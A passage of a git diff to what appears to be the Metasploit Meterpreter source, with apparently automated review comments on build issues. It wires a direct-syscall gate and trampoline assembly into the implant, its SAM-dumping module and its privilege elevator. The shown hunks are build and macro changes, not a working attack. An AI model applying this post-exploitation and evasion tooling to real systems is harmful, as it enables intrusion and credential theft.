01 )( p(0) ); break; + case 2: pOutput->qwReturnValue = stdcall_func( 02 )( p(0), p(1) ); break; + case 3: 
pOutput->qwReturnValue = stdcall_func( 03 )( p(0), p(1), p(2) ); break; + case 4: pOutput->qwReturnValue = stdcall_func( 04 )( p(0), p(1), p(2), p(3) );break; + case 5: pOutput->qwReturnValue = stdcall_func( 05 )( p(0), p(1), p(2), p(3), p(4) );break; + case 6: pOutput->qwReturnValue = stdcall_func( 06 )( p(0), p(1), p(2), p(3), p(4), p(5) );break; + case 7: pOutput->qwReturnValue = stdcall_func( 07 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6) );break; + case 8: pOutput->qwReturnValue = stdcall_func( 08 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7) );break; + case 9: pOutput->qwReturnValue = stdcall_func( 09 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8) );break; + case 10: pOutput->qwReturnValue = stdcall_func( 10 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9) );break; + case 11: pOutput->qwReturnValue = stdcall_func( 11 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10) );break; + case 12: pOutput->qwReturnValue = stdcall_func( 12 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11) );break; + case 13: pOutput->qwReturnValue = stdcall_func( 13 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12) );break; + case 14: pOutput->qwReturnValue = stdcall_func( 14 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13) );break; + case 15: pOutput->qwReturnValue = stdcall_func( 15 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14) );break; + case 16: pOutput->qwReturnValue = stdcall_func( 16 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15) );break; + case 17: pOutput->qwReturnValue = stdcall_func( 17 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16) );break; + case 18: pOutput->qwReturnValue = stdcall_func( 18 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), 
p(11), p(12), p(13), p(14), p(15), p(16), p(17) );break; + case 19: pOutput->qwReturnValue = stdcall_func( 19 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18) );break; + case 20: pOutput->qwReturnValue = stdcall_func( 20 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19) );break; + case 21: pOutput->qwReturnValue = stdcall_func( 21 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20) );break; + case 22: pOutput->qwReturnValue = stdcall_func( 22 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20), p(21) );break; + case 23: pOutput->qwReturnValue = stdcall_func( 23 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20), p(21), p(22) );break; + case 24: pOutput->qwReturnValue = stdcall_func( 24 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20), p(21), p(22), p(23) );break; + case 25: pOutput->qwReturnValue = stdcall_func( 25 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20), p(21), p(22), p(23), p(24) );break; default: dprintf( "[RAILGUN] railgun_call: Can't call function: dwStackSizeInElements (%d) is > 25", dwStackSizeInElements ); 
@@ -295,32 +295,32 @@ DWORD railgun_call( RAILGUN_INPUT * pInput, RAILGUN_OUTPUT * pOutput ) } else { // STDCALL switch( dwStackSizeInElements ) { - case 0: pOutput->qwReturnValue = function( 00 )(); break; - case 1: pOutput->qwReturnValue = function( 01 )( p(0) ); break; - case 2: pOutput->qwReturnValue = function( 02 )( p(0), p(1) ); break; - case 3: pOutput->qwReturnValue = function( 03 )( p(0), p(1), p(2) ); break; - case 4: pOutput->qwReturnValue = function( 04 )( p(0), p(1), p(2), p(3) );break; - case 5: pOutput->qwReturnValue = function( 05 )( p(0), p(1), p(2), p(3), p(4) );break; - case 6: pOutput->qwReturnValue = function( 06 )( p(0), p(1), p(2), p(3), p(4), p(5) );break; - case 7: pOutput->qwReturnValue = function( 07 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6) );break; - case 8: pOutput->qwReturnValue = function( 08 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7) );break; - case 9: pOutput->qwReturnValue = function( 09 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8) );break; - case 10: pOutput->qwReturnValue = function( 10 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9) );break; - case 11: pOutput->qwReturnValue = function( 11 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10) );break; - case 12: pOutput->qwReturnValue = function( 12 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11) );break; - case 13: pOutput->qwReturnValue = function( 13 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12) );break; - case 14: pOutput->qwReturnValue = function( 14 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13) );break; - case 15: pOutput->qwReturnValue = function( 15 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14) );break; - case 16: pOutput->qwReturnValue = function( 16 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15) );break; - 
case 17: pOutput->qwReturnValue = function( 17 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16) );break; - case 18: pOutput->qwReturnValue = function( 18 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17) );break; - case 19: pOutput->qwReturnValue = function( 19 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18) );break; - case 20: pOutput->qwReturnValue = function( 20 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19) );break; - case 21: pOutput->qwReturnValue = function( 21 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20) );break; - case 22: pOutput->qwReturnValue = function( 22 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20), p(21) );break; - case 23: pOutput->qwReturnValue = function( 23 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20), p(21), p(22) );break; - case 24: pOutput->qwReturnValue = function( 24 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20), p(21), p(22), p(23) );break; - case 25: pOutput->qwReturnValue = function( 25 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20), p(21), p(22), p(23), p(24) );break; + case 0: pOutput->qwReturnValue = stdcall_func( 00 )(); break; + case 1: pOutput->qwReturnValue = stdcall_func( 01 )( p(0) ); break; + case 2: pOutput->qwReturnValue = stdcall_func( 02 )( p(0), p(1) ); break; + case 3: 
pOutput->qwReturnValue = stdcall_func( 03 )( p(0), p(1), p(2) ); break; + case 4: pOutput->qwReturnValue = stdcall_func( 04 )( p(0), p(1), p(2), p(3) );break; + case 5: pOutput->qwReturnValue = stdcall_func( 05 )( p(0), p(1), p(2), p(3), p(4) );break; + case 6: pOutput->qwReturnValue = stdcall_func( 06 )( p(0), p(1), p(2), p(3), p(4), p(5) );break; + case 7: pOutput->qwReturnValue = stdcall_func( 07 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6) );break; + case 8: pOutput->qwReturnValue = stdcall_func( 08 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7) );break; + case 9: pOutput->qwReturnValue = stdcall_func( 09 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8) );break; + case 10: pOutput->qwReturnValue = stdcall_func( 10 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9) );break; + case 11: pOutput->qwReturnValue = stdcall_func( 11 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10) );break; + case 12: pOutput->qwReturnValue = stdcall_func( 12 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11) );break; + case 13: pOutput->qwReturnValue = stdcall_func( 13 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12) );break; + case 14: pOutput->qwReturnValue = stdcall_func( 14 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13) );break; + case 15: pOutput->qwReturnValue = stdcall_func( 15 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14) );break; + case 16: pOutput->qwReturnValue = stdcall_func( 16 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15) );break; + case 17: pOutput->qwReturnValue = stdcall_func( 17 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16) );break; + case 18: pOutput->qwReturnValue = stdcall_func( 18 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), 
p(11), p(12), p(13), p(14), p(15), p(16), p(17) );break; + case 19: pOutput->qwReturnValue = stdcall_func( 19 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18) );break; + case 20: pOutput->qwReturnValue = stdcall_func( 20 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19) );break; + case 21: pOutput->qwReturnValue = stdcall_func( 21 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20) );break; + case 22: pOutput->qwReturnValue = stdcall_func( 22 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20), p(21) );break; + case 23: pOutput->qwReturnValue = stdcall_func( 23 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20), p(21), p(22) );break; + case 24: pOutput->qwReturnValue = stdcall_func( 24 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20), p(21), p(22), p(23) );break; + case 25: pOutput->qwReturnValue = stdcall_func( 25 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20), p(21), p(22), p(23), p(24) );break; default: dprintf( "[RAILGUN] railgun_call: Can't call function: dwStackSizeInElements (%d) is > 25", dwStackSizeInElements ); diff --git a/c/meterpreter/source/extensions/stdapi/server/railgun/railgun.h b/c/meterpreter/source/extensions/stdapi/server/railgun/railgun.h old mode 100644 new mode 100755 index 32a2d0427..6439e7019 --- a/c/meterpreter/source/extensions/stdapi/server/railgun/railgun.h +++ b/c/meterpreter/source/extensions/stdapi/server/railgun/railgun.h 
@@ -47,7 +47,7 @@ typedef struct _RAILGUN_OUTPUT } RAILGUN_OUTPUT; #define p(i) (ULONG_PTR)pStack[i] -#define function(i) ((STDCALL_FUNC_##i)pFuncAddr) +#define stdcall_func(i) ((STDCALL_FUNC_##i)pFuncAddr) #define cdecl_func(i) ((CDECL_FUNC_##i)pFuncAddr) typedef ULONG_PTR (__stdcall * STDCALL_FUNC_00)( VOID ); diff --git a/c/meterpreter/source/extensions/stdapi/server/stdapi.c b/c/meterpreter/source/extensions/stdapi/server/stdapi.c old mode 100644 new mode 100755 index c9f54d2d0..503cd0426 --- a/c/meterpreter/source/extensions/stdapi/server/stdapi.c +++ b/c/meterpreter/source/extensions/stdapi/server/stdapi.c @@ -9,6 +9,7 @@ MetApi* met_api = NULL; #define RDIDLL_NOEXPORT +#include "../../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" // NOTE: _CRT_SECURE_NO_WARNINGS has been added to Configuration->C/C++->Preprocessor->Preprocessor diff --git a/c/meterpreter/source/extensions/unhook/unhook.c b/c/meterpreter/source/extensions/unhook/unhook.c old mode 100644 new mode 100755 index 381dba3f1..1a7d350a7 --- a/c/meterpreter/source/extensions/unhook/unhook.c +++ b/c/meterpreter/source/extensions/unhook/unhook.c @@ -6,6 +6,7 @@ #include "common_metapi.h" #define RDIDLL_NOEXPORT +#include "../../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" #include "unhook.h" diff --git a/c/meterpreter/source/extensions/winpmem/winpmem_meterpreter.cpp b/c/meterpreter/source/extensions/winpmem/winpmem_meterpreter.cpp old mode 100644 new mode 100755 index e85e7bb37..f8646af4e --- a/c/meterpreter/source/extensions/winpmem/winpmem_meterpreter.cpp +++ b/c/meterpreter/source/extensions/winpmem/winpmem_meterpreter.cpp @@ -7,6 +7,7 @@ extern "C" { #include "common_metapi.h" #define RDIDLL_NOEXPORT +#include "../../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" #ifndef min 
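Review bot: The new include path in the stdapi.c hunk disagrees with the line directly under it: DirectSyscall.c is taken from `../../ReflectiveDLLInjection/dll/src/` while ReflectiveLoader.c, which lives in the same directory, is taken from `../../../ReflectiveDLLInjection/dll/src/`. Relative to stdapi.c's own directory only one of the two can be right, so the new line presumably only resolves through an extra include directory rather than the file-relative lookup; I would write it as `#include "../../../ReflectiveDLLInjection/dll/src/DirectSyscall.c"` so both includes resolve the same way and the build does not silently depend on search-path order. The same file header also flips stdapi.c (and unhook.c and winpmem_meterpreter.cpp in the hunks that follow) from mode 100644 to 100755; an executable bit on C source files looks like checkout noise and should be reverted rather than committed.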
diff --git a/c/meterpreter/source/metsrv/metsrv.c b/c/meterpreter/source/metsrv/metsrv.c old mode 100644 new mode 100755 index 93773e661..b039e3bc4 --- a/c/meterpreter/source/metsrv/metsrv.c +++ b/c/meterpreter/source/metsrv/metsrv.c @@ -10,6 +10,7 @@ #define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN #define RDIDLL_NOEXPORT +#include "../../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" #include "../ReflectiveDLLInjection/inject/src/GetProcAddressR.c" #include "../ReflectiveDLLInjection/inject/src/LoadLibraryR.c" diff --git a/c/meterpreter/source/metsrv/metsrv.h b/c/meterpreter/source/metsrv/metsrv.h old mode 100644 new mode 100755 index e73aaacd8..7013b66d5 --- a/c/meterpreter/source/metsrv/metsrv.h +++ b/c/meterpreter/source/metsrv/metsrv.h @@ -18,6 +18,10 @@ #include "remote_dispatch.h" #include "libloader.h" +#define EXITFUNC_SEH 0xEA320EFE +#define EXITFUNC_THREAD 0x0A2A1DE0 +#define EXITFUNC_PROCESS 0x56A2B5F0 + #include "../ReflectiveDLLInjection/inject/src/GetProcAddressR.h" #include "../ReflectiveDLLInjection/inject/src/LoadLibraryR.h" #include "../ReflectiveDLLInjection/dll/src/ReflectiveLoader.h" diff --git a/c/meterpreter/source/screenshot/screenshot.c b/c/meterpreter/source/screenshot/screenshot.c old mode 100644 new mode 100755 index 11d49ad52..1a70b6d25 --- a/c/meterpreter/source/screenshot/screenshot.c +++ b/c/meterpreter/source/screenshot/screenshot.c @@ -9,6 +9,7 @@ #define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN #define RDIDLL_NOEXPORT +#include "../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" /* diff --git a/c/meterpreter/workspace/CMakeLists.txt b/c/meterpreter/workspace/CMakeLists.txt index cdf3207a6..21b9b1d16 100644 --- a/c/meterpreter/workspace/CMakeLists.txt +++ b/c/meterpreter/workspace/CMakeLists.txt 
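Review bot: In the metsrv.c hunk the added `#include "../../ReflectiveDLLInjection/dll/src/DirectSyscall.c"` uses one more `../` than the three existing ReflectiveDLLInjection includes right below it, which all start with `../ReflectiveDLLInjection/`. From metsrv.c's directory the `../../` form points outside the source tree, so it presumably only works if an include directory happens to make it resolvable; it should read `#include "../ReflectiveDLLInjection/dll/src/DirectSyscall.c"` to match its neighbours. The metsrv.c header also changes the file mode from 100644 to 100755, which is almost certainly unintended for a .c file.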
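Review bot: The three `EXITFUNC_*` constants added to metsrv.h carry no comment saying what the values are or who consumes them, and a reader cannot derive that from the header. They look like the API-name hashes Metasploit already uses for its exit-function selection (SetUnhandledExceptionFilter / ExitThread / ExitProcess), but that is an inference, so whoever added them should state the origin explicitly, e.g. `// EXITFUNC selectors: hash of the exit API the stager was generated with; must match the values used on the framework side` above the block, and name the consumer if it lives in DirectSyscall.c. Without that, the next person who sees a mismatched hash has no way to tell which side is wrong.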
@@ -225,6 +225,8 @@ if(BUILD_METSRV) set(MET_SERVERS metsrv) endif() +set(MET_RDI_ASM ReflectiveDLLInjection) + set( MET_DLLS ${MET_SERVERS} @@ -234,6 +236,7 @@ set( set( MET_PROJECTS + ${MET_RDI_ASM} ${MET_LIBS} ${MET_DLLS} ) diff --git a/c/meterpreter/workspace/ReflectiveDLLInjection/CMakeLists.txt b/c/meterpreter/workspace/ReflectiveDLLInjection/CMakeLists.txt new file mode 100644 index 000000000..f94f03797 --- /dev/null +++ b/c/meterpreter/workspace/ReflectiveDLLInjection/CMakeLists.txt @@ -0,0 +1,19 @@ +cmake_minimum_required(VERSION 3.15.7 FATAL_ERROR) + +set(PROJECT_NAME ReflectiveDLLInjection) + +project(${PROJECT_NAME} ASM) + +set(SRC_DIR ../../source/ReflectiveDLLInjection/dll/src) +if("${CMAKE_SYSTEM_PROCESSOR}" MATCHES "(x86_64|amd64)") + set(SRC_FILES ${SRC_DIR}/GateTrampoline64.s) +elseif("${CMAKE_SYSTEM_PROCESSOR}" MATCHES "(i386|i686)") + set(SRC_FILES ${SRC_DIR}/GateTrampoline32.s) +endif() + +set_property(DIRECTORY PROPERTY COMPILE_DEFINITIONS) +set_property(DIRECTORY PROPERTY INCLUDE_DIRECTORIES) +set(CMAKE_ASM_FLAGS_RELEASE_INIT "") +set(CMAKE_ASM_FLAGS_RELEASE "") + +add_library(${PROJECT_NAME} ${SRC_FILES}) diff --git a/c/meterpreter/workspace/ReflectiveDLLInjection/ReflectiveDLLInjection.vcxproj b/c/meterpreter/workspace/ReflectiveDLLInjection/ReflectiveDLLInjection.vcxproj index ba50be544..dce0c22b2 100644 --- a/c/meterpreter/workspace/ReflectiveDLLInjection/ReflectiveDLLInjection.vcxproj +++ b/c/meterpreter/workspace/ReflectiveDLLInjection/ReflectiveDLLInjection.vcxproj @@ -187,16 +187,28 @@ + + + + + true + true + + + true + true + + diff --git a/c/meterpreter/workspace/dump_sam/CMakeLists.txt b/c/meterpreter/workspace/dump_sam/CMakeLists.txt index 06842a04a..d69b3ded8 100644 --- a/c/meterpreter/workspace/dump_sam/CMakeLists.txt +++ b/c/meterpreter/workspace/dump_sam/CMakeLists.txt 
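Review bot: In the new ReflectiveDLLInjection/CMakeLists.txt the `if`/`elseif` on `CMAKE_SYSTEM_PROCESSOR` has no `else()`, so on any other value `SRC_FILES` stays unset and `add_library(${PROJECT_NAME} ${SRC_FILES})` fails with an unrelated "no sources" error instead of saying why. The match is also case-sensitive and only knows `x86_64|amd64` and `i386|i686`; if this is ever configured natively, CMake commonly reports `AMD64` or `x86` on Windows, neither of which is caught. I would lower-case the value first and fail loudly: `string(TOLOWER "${CMAKE_SYSTEM_PROCESSOR}" RDI_ARCH)` before the `if`, use `RDI_ARCH` in both `MATCHES` (adding `x86` to the 32-bit alternatives), and finish with `else() message(FATAL_ERROR "no gate trampoline for ${CMAKE_SYSTEM_PROCESSOR}") endif()`. A one-line comment noting that the `.s` sources are GNU-assembler syntax and which toolchains this project file is meant for would also help, since `project(... ASM)` under MSVC does not assemble them.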
@@ -25,7 +25,7 @@ if(MSVC) endif() set(LINK_LIBS psapi rpcrt4) -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) if(MSVC) target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070") endif() diff --git a/c/meterpreter/workspace/dump_sam/dump_sam.vcxproj b/c/meterpreter/workspace/dump_sam/dump_sam.vcxproj index 15be2cea9..bebb0d00d 100755 --- a/c/meterpreter/workspace/dump_sam/dump_sam.vcxproj +++ b/c/meterpreter/workspace/dump_sam/dump_sam.vcxproj @@ -56,6 +56,7 @@ + @@ -112,10 +113,11 @@ MultiThreaded false false - StdCall + Cdecl CompileAsC Default false + false Windows @@ -125,6 +127,7 @@ false false $(ProjectDir)../../source/dump_sam/dump_sam.def + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -146,8 +149,9 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) true MultiThreadedDLL false - StdCall + Cdecl CompileAsC + false Windows @@ -158,6 +162,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) false DllMain $(ProjectDir)../../source/dump_sam/dump_sam.def + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -181,10 +186,11 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" MultiThreaded false false - StdCall + Cdecl CompileAsC Default false + false Windows @@ -194,6 +200,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" false false $(ProjectDir)../../source/dump_sam/dump_sam.def + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -215,8 +222,9 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) true MultiThreadedDLL false - StdCall + Cdecl CompileAsC + false Windows 
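Review bot: The dump_sam.vcxproj hunks switch the project-wide calling convention from `StdCall` to `Cdecl` in every configuration, which on x86 changes the ABI of every function that does not carry an explicit `__stdcall`/`WINAPI`/`CALLBACK` specifier, including anything exported through `dump_sam.def` and any callback handed to a Win32 API. If the exports and callbacks are all explicitly qualified this is harmless; if not, a caller that loads the DLL and invokes an export through a typed pointer will corrupt the stack. The commit gives no reason for the flip, so I would either confirm every exported/callback function is explicitly qualified or add an XML comment next to the property such as `<!-- Cdecl: required by the DirectSyscall gate; exports and callbacks must be explicitly __stdcall -->`. The same change is repeated for elevator.vcxproj further down and deserves the same check.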
@@ -227,6 +235,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) false DllMain $(ProjectDir)../../source/dump_sam/dump_sam.def + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -248,8 +257,18 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" + + true + true + + + Document + true + true + + \ No newline at end of file diff --git a/c/meterpreter/workspace/elevator/CMakeLists.txt b/c/meterpreter/workspace/elevator/CMakeLists.txt index b7a3afd73..e18964f3f 100644 --- a/c/meterpreter/workspace/elevator/CMakeLists.txt +++ b/c/meterpreter/workspace/elevator/CMakeLists.txt @@ -24,7 +24,7 @@ set_target_properties(${PROJECT_NAME} PROPERTIES OUTPUT_NAME ${PROJECT_NAME}.${T set_target_properties(${PROJECT_NAME} PROPERTIES LINK_FLAGS "/DEF:\"${MOD_DEF_DIR}/plugin.def\"") set_source_files_properties(${MOD_DEF_DIR}/plugin.def PROPERTIES HEADER_FILE_ONLY TRUE) -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) if(MSVC) target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070") endif() diff --git a/c/meterpreter/workspace/elevator/elevator.vcxproj b/c/meterpreter/workspace/elevator/elevator.vcxproj index d0b5620f4..749cb53ac 100644 --- a/c/meterpreter/workspace/elevator/elevator.vcxproj +++ b/c/meterpreter/workspace/elevator/elevator.vcxproj @@ -122,7 +122,7 @@ NotUsing Level3 ProgramDatabase - StdCall + Cdecl CompileAsC false true @@ -145,6 +145,7 @@ $(ProjectDir)..\..\source\def\plugin.def /ignore:4070 %(AdditionalOptions) + false editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -163,7 +164,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" NotUsing Level3 ProgramDatabase - StdCall + Cdecl CompileAsC false true 
@@ -187,6 +188,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" /ignore:4070 %(AdditionalOptions) + false editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -205,7 +207,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) NotUsing Level3 ProgramDatabase - StdCall + Cdecl CompileAsC false true @@ -228,6 +230,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) $(ProjectDir)..\..\source\def\plugin.def /ignore:4070 %(AdditionalOptions) + false editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -249,7 +252,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" NotUsing Level3 ProgramDatabase - StdCall + Cdecl CompileAsC true ..\..\source\ReflectiveDLLInjection\common;..\..\source\common @@ -288,7 +291,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" NotUsing Level3 ProgramDatabase - StdCall + Cdecl CompileAsC true ..\..\source\ReflectiveDLLInjection\common;..\..\source\common @@ -329,7 +332,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) NotUsing Level3 ProgramDatabase - StdCall + Cdecl CompileAsC true ..\..\source\ReflectiveDLLInjection\common;..\..\source\common @@ -365,6 +368,20 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" + + + true + Document + true + true + ASSEMBLE + + + true + true + true + + @@ -372,4 +389,4 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" - + \ No newline at end of file diff --git a/c/meterpreter/workspace/ext_server_bofloader/CMakeLists.txt b/c/meterpreter/workspace/ext_server_bofloader/CMakeLists.txt index 702c7f640..fbd48fd03 100644 --- a/c/meterpreter/workspace/ext_server_bofloader/CMakeLists.txt +++ b/c/meterpreter/workspace/ext_server_bofloader/CMakeLists.txt 
